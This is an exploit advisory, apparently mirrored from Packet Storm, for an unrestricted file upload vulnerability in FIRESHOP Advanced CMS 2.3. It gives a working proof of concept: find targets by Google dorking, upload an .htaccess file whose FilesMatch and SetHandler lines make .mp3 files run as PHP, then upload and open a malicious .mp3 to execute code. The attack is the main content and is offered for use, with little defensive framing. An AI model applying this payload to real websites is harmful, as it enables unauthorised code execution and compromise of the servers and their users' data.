Exploit for FIRESHOP Advanced CMS 2.3 Arbitrary File Upload

## https://sploitus.com/exploit?id=PACKETSTORM:174252
====================================================================================================================================  
| # Title : FIRESHOP Advanced CMS v2.3 unrestricted file upload Vulnerability |  
| # Author : indoushka |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit) |  
| # Vendor : https://p30vel.ir |  
| # Dork : R.I.P |  
====================================================================================================================================  
  
poc :  
  
[+] Dorking İn Google Or Other Search Enggine .  
  
[+] Unauthorized access. Allows any user to upload malicious files and run them  
  
[+] after login go to http://127.0.0.1/frtu/upload.php  
  
[+] use payload :   
  
<FilesMatch "^.*\.mp3">  
SetHandler application/x-httpd-php  
</FilesMatch>  
  
[+] 1- save code as .htaccess and upload it  
  
[+] 2- Upload the malicious file in the form of extension (.mp3) 3v!l.mp3  
  
[+] go to http://127.0.0.1/frtu/img/upload/up.mp3  
  
Greetings to :=========================================================================================================================  
jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |  
=======================================================================================================================================